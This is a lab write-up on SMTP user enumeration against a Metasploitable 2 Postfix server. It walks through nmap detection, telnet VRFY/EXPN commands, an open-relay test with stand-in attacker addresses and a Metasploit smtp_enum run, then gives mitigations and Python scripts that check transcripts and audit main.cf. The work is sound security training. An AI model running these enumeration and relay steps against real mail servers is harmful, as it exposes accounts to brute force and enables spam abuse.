SMTP — User Enumeration & Banner Disclosure

Unauthenticated Username Enumeration via VRFY/EXPN Commands

CVE: N/A (Misconfiguration)
Port: 25/tcp
Impact: Info Disclosure
Tool: Netcat / Metasploit
Severity: Medium
Service: Postfix smtpd
Attack Type: Information Disclosure
MSF Module: auxiliary/scanner/smtp/smtp_enum
Result: ✓ Valid Users Enumerated

01. Vulnerability Overview

SMTP (Simple Mail Transfer Protocol) is used to send email between servers. Metasploitable 2 runs Postfix smtpd on port 25. While not directly exploitable for remote code execution, the service leaks sensitive system information through its banner and unauthenticated VRFY/EXPN commands.

VRFY and EXPN allow any unauthenticated client to verify whether a username exists on the system. This is a critical reconnaissance step — valid usernames can fuel SSH/Telnet brute-force attacks.

02. Service Detection

```bash
nmap -sV -v -p 25 <target-ip>
```

Figure: Nmap SMTP Service Version Scan

04. User Enumeration via VRFY

After connecting, use the VRFY and EXPN commands to check if users exist on the system:

```smtp
# Connect to SMTP
telnet <target-ip> 25

# Initiate SMTP session
HELO attacker.com

# Verify whether these users exist (250/252 = valid, 550 = invalid)
VRFY root
VRFY msfadmin
VRFY postgres
VRFY user

# Expand mailing list / alias
EXPN postmaster
```

Figure: VRFY Command, Enumerating Valid System Users

A 252 or 250 response confirms the username is valid. A 550 response means no such user exists. Confirmed users can now be targeted in follow-on attacks like SSH/Telnet brute force.
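To interpret the replies without reading each one by hand, the Python script below (an added example written for this write-up, not part of the original page and not Postfix or Metasploit tooling) parses a captured SMTP transcript, handles multi-line replies, and classifies every VRFY/EXPN by the codes described above, adding 502, which Postfix returns once disable_vrfy_command = yes is set. Both transcripts are constructed: the first imitates a Metasploitable 2 session, the second the same commands against a hardened server whose hostname mail.example.test is a placeholder.

```python
import re

# Reply code -> verdict. 250/252/550 follow the write-up; 502 is what Postfix
# answers once disable_vrfy_command = yes is in place (the hardened state).
VERDICTS = {
    "250": "valid user",
    "252": "valid user (server will accept mail, cannot fully verify)",
    "550": "no such user",
    "502": "command disabled (hardened)",
}

# RFC 5321 reply line: 3-digit code, then '-' (more lines follow) or ' ' (last line).
REPLY_RE = re.compile(r"^(?P<code>\d{3})(?P<sep>[ -])(?P<text>.*)$")

# Constructed transcript imitating a Metasploitable 2 session ("C:" client, "S:" server).
BEFORE_HARDENING = """\
S: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
C: HELO attacker.com
S: 250 metasploitable.localdomain
C: VRFY root
S: 252 2.0.0 root
C: VRFY msfadmin
S: 252 2.0.0 msfadmin
C: VRFY nosuchuser
S: 550 5.1.1 <nosuchuser>: Recipient address rejected: User unknown in local recipient table
C: QUIT
S: 221 2.0.0 Bye
"""

# Constructed transcript against a hardened Postfix (placeholder hostname);
# the EHLO reply exercises multi-line parsing.
AFTER_HARDENING = """\
S: 220 mail.example.test ESMTP
C: EHLO attacker.com
S: 250-mail.example.test
S: 250-PIPELINING
S: 250 8BITMIME
C: VRFY root
S: 502 5.5.1 VRFY command is disabled
C: VRFY msfadmin
S: 502 5.5.1 VRFY command is disabled
C: QUIT
S: 221 2.0.0 Bye
"""


def classify_transcript(transcript):
    """Pair each client command with its (possibly multi-line) server reply and
    return [(verb, argument, code, verdict)] for every VRFY/EXPN in the session."""
    results = []
    pending = None      # client command awaiting a reply (None for the greeting)
    reply_code = None   # code of the multi-line reply currently being assembled
    for raw in transcript.strip().splitlines():
        tag, _, body = raw.partition(" ")
        if tag == "C:":
            pending = body.strip()
            continue
        if tag != "S:":
            raise ValueError(f"unexpected transcript line: {raw!r}")
        m = REPLY_RE.match(body)
        if m is None:
            raise ValueError(f"malformed SMTP reply: {body!r}")
        if reply_code is not None and reply_code != m["code"]:
            raise ValueError("reply code changed inside a multi-line reply")
        reply_code = m["code"]
        if m["sep"] == "-":
            continue                       # continuation line, keep reading
        # Final line of the reply: record what it says about the pending command.
        if pending is not None:
            verb, _, arg = pending.partition(" ")
            verb = verb.upper()
            if verb in ("VRFY", "EXPN"):
                verdict = VERDICTS.get(reply_code, f"unhandled reply {reply_code}")
                results.append((verb, arg.strip(), reply_code, verdict))
        pending, reply_code = None, None
    return results


def vrfy_exposed(transcript):
    """True if any VRFY/EXPN was answered with a code that separates valid from
    invalid users, i.e. the server still leaks account names."""
    return any(code in ("250", "252", "550")
               for _, _, code, _ in classify_transcript(transcript))


if __name__ == "__main__":
    for label, t in (("before", BEFORE_HARDENING), ("after", AFTER_HARDENING)):
        print(f"[{label}] VRFY exposed: {vrfy_exposed(t)}")
        for verb, arg, code, verdict in classify_transcript(t):
            print(f"  {verb} {arg:<12} -> {code} {verdict}")
```

The same classifier doubles as a hardening check: run it over a transcript taken from your own server after applying the mitigations and vrfy_exposed() should return False, with every VRFY answered by 502.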

05. Testing for Open Relay

Test whether the server will relay emails to external domains (open relay = potential spam abuse):

```smtp
# Envelope sender and recipient (angle brackets as required by RFC 5321)
MAIL FROM:<attacker@evil.com>
RCPT TO:<victim@external.com>
# A 250 reply to RCPT TO for an external domain means relaying is allowed;
# a correctly restricted Postfix answers 554 5.7.1 Relay access denied here
DATA
Subject: Open Relay Test

This is a test message.
.
QUIT
```

If the server accepts the message and attempts delivery to external.com, it's an open relay and can be abused for spam or phishing operations.


06. Automated Enumeration — Metasploit

```bash
msfconsole
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target-ip>
set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
run
```

07. Results & Impact

Outcome

  • SMTP banner revealed server software version and hostname
  • VRFY command confirmed valid system users: msfadmin, root, postgres
  • Enumerated users can now be targeted in SSH / Telnet brute-force
  • Open relay risk identified for spam abuse

Detection & Mitigation (Blue Team)

  • Disable VRFY and EXPN commands in Postfix: set disable_vrfy_command = yes
  • Sanitize banner messages — avoid leaking server version details
  • Configure Postfix to prevent open relay — restrict mynetworks
  • Monitor SMTP traffic for anomalous VRFY/EXPN command usage
  • Apply firewall rules to restrict port 25 to known mail servers
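As an added check for the mitigation list above and for the open relay section (example code written for this write-up, not Postfix's own tooling), the Python script below parses main.cf text and reports which of the configuration-level mitigations are missing. Both configurations are constructed: the weak one mirrors Postfix's default banner and VRFY behaviour plus an over-broad mynetworks and a relay policy that ends in permit; the hardened one applies the settings listed. Hostnames are placeholders, and the firewall rule lives outside main.cf so it is not checked.

```python
import re

# Constructed weak configuration: Postfix defaults for banner and VRFY, an
# over-broad mynetworks and a relay policy ending in "permit" (open relay).
WEAK_MAIN_CF = """\
# constructed sample, not copied from Metasploitable 2
myhostname = metasploitable.localdomain
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
mynetworks = 127.0.0.0/8 0.0.0.0/0
smtpd_recipient_restrictions = permit_mynetworks,
    permit
"""

# Constructed hardened configuration applying the main.cf mitigations above.
HARDENED_MAIN_CF = """\
myhostname = mail.example.test
smtpd_banner = $myhostname ESMTP
disable_vrfy_command = yes
mynetworks = 127.0.0.0/8 [::1]/128
smtpd_relay_restrictions = permit_mynetworks,
    permit_sasl_authenticated,
    reject_unauth_destination
"""

# Either of these rules stops unauthenticated clients relaying to other domains.
RELAY_GUARDS = ("reject_unauth_destination", "defer_unauth_destination")


def parse_main_cf(text):
    """Return {parameter: value} from main.cf text. Later definitions win, as in
    postconf, and a line starting with whitespace continues the previous value."""
    params, last = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if line[0].isspace() and last is not None:
            params[last] = f"{params[last]} {line.strip()}".strip()
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"not a parameter line: {line!r}")
        last = key.strip()
        params[last] = value.strip()
    return params


def audit(params):
    """Return the list of findings for a parsed config; empty means all checks pass."""
    findings = []

    # 1. VRFY/EXPN: Postfix answers VRFY unless disable_vrfy_command = yes.
    if params.get("disable_vrfy_command", "no").lower() != "yes":
        findings.append("VRFY enabled: set disable_vrfy_command = yes")

    # 2. Banner: the default "$myhostname ESMTP $mail_name" expands to the
    #    software name, and distro builds may append the distro name too.
    banner = params.get("smtpd_banner", "$myhostname ESMTP $mail_name")
    if any(tok in banner for tok in ("$mail_name", "$mail_version", "Postfix")):
        findings.append("banner leaks software: set smtpd_banner = $myhostname ESMTP")

    # 3. Relay policy: whichever restriction list is explicitly set must contain
    #    a reject_/defer_unauth_destination rule. Unset means the Postfix
    #    default, which already contains one, so only explicit lists are checked.
    relay = params.get("smtpd_relay_restrictions",
                       params.get("smtpd_recipient_restrictions"))
    if relay is not None:
        rules = [r for r in re.split(r"[,\s]+", relay) if r]
        if not any(r in RELAY_GUARDS for r in rules):
            findings.append("open relay: add reject_unauth_destination to "
                            "smtpd_relay_restrictions")

    # 4. mynetworks: a /0 entry makes every client a trusted relay source.
    nets = [n for n in re.split(r"[,\s]+", params.get("mynetworks", "")) if n]
    if any(net.endswith("/0") for net in nets):
        findings.append("mynetworks trusts every address: drop the /0 entry")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_MAIN_CF), ("hardened", HARDENED_MAIN_CF)):
        findings = audit(parse_main_cf(text))
        print(f"[{label}] {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

To audit a live host, feed the script the output of postconf -n, which prints the explicitly set parameters in the same key = value form; the weak sample produces four findings and the hardened one none.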